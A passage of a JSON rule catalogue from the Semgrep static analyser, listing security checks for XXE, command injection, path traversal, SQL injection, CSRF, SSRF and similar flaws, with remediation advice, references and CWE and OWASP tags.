Rule](https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","id":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","name":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","id":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","name":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC777 tokensReceived() reentrancy"},"help":{"markdown":"ERC777 tokensReceived() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy)\n - [https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0](https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0)\n - [https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f](https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f)\n","text":"ERC777 tokensReceived() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy","id":"solidity.security.erc777-reentrancy.erc777-reentrancy","name":"solidity.security.erc777-reentrancy.erc777-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc777-reentrancy.erc777-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"help":{"markdown":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n - [https://eprint.iacr.org/2016/759.pdf](https://eprint.iacr.org/2016/759.pdf)\n - [https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf](https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf)\n - [https://datatracker.ietf.org/doc/html/rfc9106#section-4](https://datatracker.ietf.org/doc/html/rfc9106#section-4)\n","text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"helpUri":"https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","id":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","name":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"help":{"markdown":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization)\n - [https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution](https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution)\n","text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","id":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","name":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"help":{"markdown":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md)\n - [https://owasp.org/www-community/attacks/HTTP_Response_Splitting](https://owasp.org/www-community/attacks/HTTP_Response_Splitting)\n","text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection","id":"generic.nginx.security.header-injection.header-injection","name":"generic.nginx.security.header-injection.header-injection","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.header-injection.header-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","id":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","name":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-empty-password.node-mssql-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe","id":"java.lang.security.xxe.validator-xxe.validator-xxe","name":"java.lang.security.xxe.validator-xxe.validator-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.validator-xxe.validator-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","id":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","name":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename","id":"javascript.express.express-fs-filename.express-fs-filename","name":"javascript.express.express-fs-filename.express-fs-filename","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.express-fs-filename.express-fs-filename"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","id":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","name":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"help":{"markdown":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"helpUri":"https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","id":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","name":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"help":{"markdown":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","id":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","name":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite)\n - [https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application](https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","id":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","name":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base 